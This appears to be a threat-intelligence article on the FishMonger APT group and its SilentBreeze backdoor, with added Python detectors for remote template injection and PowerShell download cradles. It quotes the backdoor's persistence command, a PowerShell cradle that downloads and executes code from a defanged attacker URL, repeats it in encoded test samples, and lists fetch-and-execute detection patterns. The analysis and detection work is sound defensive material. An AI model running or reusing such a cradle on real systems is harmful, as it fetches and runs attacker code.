Recent cybersecurity investigations have uncovered a sophisticated threat actor dubbed “FishMonger” operating under the umbrella of I-SOON, a Chinese company with alleged ties to state-sponsored hacking operations.
This Advanced Persistent Threat (APT) group has been systematically targeting government institutions and non-governmental organizations across Southeast Asia and parts of Europe since at least 2021.
The attacks show a high level of sophistication, with carefully crafted phishing campaigns and custom malware designed to exfiltrate sensitive diplomatic and policy-related information from targeted organizations.
Initial analysis suggests FishMonger’s operations align with Chinese strategic interests, particularly focusing on entities involved in South China Sea territorial disputes and international human rights advocacy groups monitoring activities in the region.
The group maintains persistent access to compromised networks for extended periods, often remaining undetected for months while harvesting credentials and sensitive documents.
ESET researchers identified distinctive patterns in FishMonger’s attack chain, including the use of template injection in Microsoft Office documents and a custom backdoor called “SilentBreeze” that establishes command and control connections through encrypted channels.
This APT employs sophisticated counter-detection techniques, regularly modifying its toolset to evade security solutions.
The initial infection typically begins with spear-phishing emails containing malicious documents tailored to the victim organization.
When opened, these documents exploit vulnerabilities or use social engineering to execute a multi-stage infection process.
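Remote template injection, the Office technique ESET attributes to FishMonger, leaves a recoverable trace in the document itself: a relationship of type attachedTemplate whose target is a network location that Word fetches on open. The following detector is an added example written for this article, not ESET's or the article's code; it constructs minimal .docx files in memory (all targets are placeholders) and flags only network targets, since a local Normal.dotm uses the same relationship type legitimately.

```python
"""Detect remote-template injection in a .docx.

Added example; not ESET's or the article's code. A Word file with an injected
remote template carries a relationship in word/_rels/settings.xml.rels whose
Type is attachedTemplate and whose Target is a URL or UNC path; Word fetches it
on open, which is how a lure document pulls its next stage. A local template
path (Normal.dotm on the user's drive) uses the same relationship type and is
legitimate, so only network targets are flagged. The sample documents are
constructed in memory and every target is a placeholder.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Targets that make Word reach out over the network when the document opens.
NETWORK_PREFIXES = ("http://", "https://", "\\\\", "file://\\\\", "file:////")


def find_remote_templates(docx_bytes: bytes) -> List[str]:
    """Return attachedTemplate targets that point at a network location."""
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            # Relationship parts for settings.xml and other word/ parts live here.
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(NETWORK_PREFIXES):
                    hits.append(target)
    return hits


def build_docx(template_target: Optional[str]) -> bytes:
    """Construct a minimal docx; with template_target set, add an attachedTemplate relationship."""
    rels = [
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        f'<Relationships xmlns="{REL_NS}">',
    ]
    if template_target is not None:
        rels.append(
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_target}" TargetMode="External"/>'
        )
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Placeholder parts; only the .rels file matters to the detector.
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{WORD_NS}"/>')
        zf.writestr("word/settings.xml", f'<w:settings xmlns:w="{WORD_NS}"/>')
        zf.writestr("word/_rels/settings.xml.rels", "\n".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    samples = [
        ("clean", None),
        ("local template", "file:///C:/Users/analyst/AppData/Roaming/Microsoft/Templates/Normal.dotm"),
        ("remote template", "https://template-host.invalid/briefing.dotm"),
    ]
    for label, target in samples:
        print(f"{label}: {find_remote_templates(build_docx(target))}")
```

Run over a mail-gateway quarantine or a sandbox's dropped files, a non-empty result is a strong signal on its own; the URL it returns is also the first infrastructure indicator to pivot on, before any macro or shellcode analysis.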
Figure: The phishing email targeting a Southeast Asian diplomatic mission, with a document purporting to contain regional security briefing information.
Analysis of SilentBreeze Backdoor
The SilentBreeze backdoor utilizes a complex encryption algorithm to obscure its command and control traffic.
Upon execution, it creates persistence through a scheduled task that executes the following PowerShell command:
$wc = New-Object System.Net.WebClient;
$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");
$wc.DownloadString("hxxps://cdn-storage[.]cloud-service[.]site/updates.php") | IEX
This command downloads and executes additional payloads from the attacker’s infrastructure.
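The persistence command above is a classic download cradle: a fetch primitive (WebClient.DownloadString) piped into an execution primitive (IEX). That pairing is what a detection should key on, regardless of the URL, which the actor can rotate at will. The scanner below is an added example written for this article, not ESET's or the article's code; it runs over constructed scheduled-task command lines and ScriptBlock-style text, and decodes the -EncodedCommand form first, since that is how such a task often hides the cradle.

```python
"""Detect PowerShell download cradles of the kind SilentBreeze uses for persistence.

Added example; not ESET's or the article's code. It scans constructed scheduled-task
command lines and ScriptBlock log text for the pairing that defines a cradle: a
fetch primitive (WebClient.DownloadString, Invoke-WebRequest, ...) combined with an
execution primitive (IEX / Invoke-Expression). The -EncodedCommand form, which
hides the cradle as base64-encoded UTF-16LE, is decoded before matching.
"""
import base64
import re
from typing import List

# Fetch primitives commonly paired with IEX in one-line cradles.
FETCH = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b",
    re.I,
)
# Execution primitives: the alias IEX or its full cmdlet name.
EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str) -> str:
    """Return the decoded script if text carries -EncodedCommand, else text unchanged."""
    m = ENCODED.search(text)
    if not m:
        return text
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text  # malformed blob: fall back to matching the raw line


def is_download_cradle(text: str) -> bool:
    """True when a fetch primitive and an execution primitive occur in the same command."""
    decoded = decode_encoded_command(text)
    return bool(FETCH.search(decoded) and EXEC.search(decoded))


def scan(lines: List[str]) -> List[str]:
    """Return the lines that look like download cradles."""
    return [line for line in lines if is_download_cradle(line)]


# Constructed samples. The first mirrors the command quoted in the article (defanged URL kept).
SAMPLE_CRADLE = (
    "powershell.exe -NoP -W Hidden -c \"$wc = New-Object System.Net.WebClient; "
    "$wc.DownloadString('hxxps://cdn-storage[.]cloud-service[.]site/updates.php') | IEX\""
)
# The same cradle wrapped in -EncodedCommand, as a scheduled task might carry it.
SAMPLE_ENCODED = "powershell.exe -NoP -enc " + base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString("
    "'hxxps://cdn-storage[.]cloud-service[.]site/updates.php')".encode("utf-16-le")
).decode("ascii")
# Ordinary administration: no fetch, no exec.
SAMPLE_BENIGN = "powershell.exe -c Get-ScheduledTask | Where-Object State -eq Ready"
# Download without execution: not a cradle by this rule, though worth separate review.
SAMPLE_FETCH_ONLY = "powershell.exe -c Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"
SAMPLE_LINES = [SAMPLE_CRADLE, SAMPLE_ENCODED, SAMPLE_BENIGN, SAMPLE_FETCH_ONLY]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print("cradle:", hit[:80])
```

Feed it the Arguments field of scheduled-task XML, Event ID 4688 command lines or 4104 script blocks; the fetch-only case is deliberately left out of the match so the rule stays precise, and can be a lower-severity rule of its own.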
The malware then establishes communication with its command servers.
Figure: Network traffic pattern distinctive to SilentBreeze infections.
The group’s infrastructure relies heavily on compromised third-party websites serving as proxies to mask the true command servers, making attribution and takedown efforts particularly challenging for defending organizations and cybersecurity researchers tracking their activities.